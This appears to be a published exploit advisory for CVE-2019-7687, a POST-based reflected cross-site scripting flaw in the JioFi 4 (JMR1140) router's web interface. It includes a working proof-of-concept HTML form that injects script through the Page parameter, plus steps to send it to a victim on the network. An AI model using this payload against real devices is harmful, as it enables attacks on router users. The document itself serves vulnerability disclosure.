Jiofi 4 (JMR 1140) Cross Site Scripting

Jiofi 4 (JMR 1140) with firmware version Amtel_JMR1140_R12.07 suffers from a cross site scripting vulnerability.


MD5 | 44327251f5c9f546049ea0bb8e177299

# Exploit Title: Jiofi 4 (JMR 1140) Reflected Cross Site Scripting
# Date: 12.02.2019
# Exploit Author: Ronnie T Baby
# Contact:https://www.linkedin.com/in/ronnietbaby
# Vendor Homepage: www.jio.com
# Hardware Link: https://www.jio.com/shop/en-in/jmr-1140/p/491193574
# Category: Hardware (Wifi Router)
# Version: JMR-1140 Firmware v. Amtel_JMR1140_R12.07
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-7687


Description:
cgi-bin/qcmap_web_cgi on JioFi 4 jmr1140 Amtel_JMR1140_R12.07 devices has POST based reflected XSS via the Page parameter. No sanitization is performed for user input data.

1. Create a poc.html and insert

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://jiofi.local.html/cgi-bin/qcmap_web_cgi" method="POST">
<input type="hidden" name="Page" value="GetDeviceDetailsyfc7b<script>alert(document.domain)</script>pyk0j" />
<input type="hidden" name="mask" value="0" />
<input type="hidden" name="token" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>d
</html>

2. Send to victim(who is connected to the wifi network).
3. Post based Xss gets fired .

Exploit working in firefox quantum ,firefox dev edition etc. Chrome XSS auditor blocks this POC.


Related Posts